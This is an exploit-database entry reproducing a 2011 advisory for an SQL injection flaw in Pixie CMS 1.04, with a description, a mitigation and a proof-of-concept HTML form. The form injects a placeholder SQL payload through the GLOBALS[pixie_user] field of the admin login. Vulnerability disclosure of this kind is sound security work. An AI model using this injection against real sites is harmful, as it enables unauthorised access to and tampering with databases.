header-logo
Suggest Exploit
vendor:
Pixie CMS
by:
SecurityFocus
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pixie CMS
Affected Version From: 01.04
Affected Version To: 01.04
Patch Exists: YES
Related CWE: N/A
CPE: a:pixie_cms:pixie_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Pixie CMS SQL Injection Vulnerability

Pixie is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the database layer.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45937/info

Pixie is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Pixie CMS 1.04 is vulnerable; other versions may also be affected.

NOTE (May 10, 2011): This BID was previously titled 'Pixie Multiple SQL Injection Vulnerabilities'. It has been re-written because one of the vulnerabilities duplicates an issue described in BID 34189 (Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities). 

<form action="http://www.example.com/admin/index.php" method="post" name="main" >
<input name="username" value="1" type="hidden">
<input name="password" value="1" type="hidden">
<input name="login_submit" value="1" type="hidden">
<input name="GLOBALS[pixie_user]" value="123'SQL_CODE_HERE" type="hidden">
<input type="submit" value="submit" name="submit" />
</form>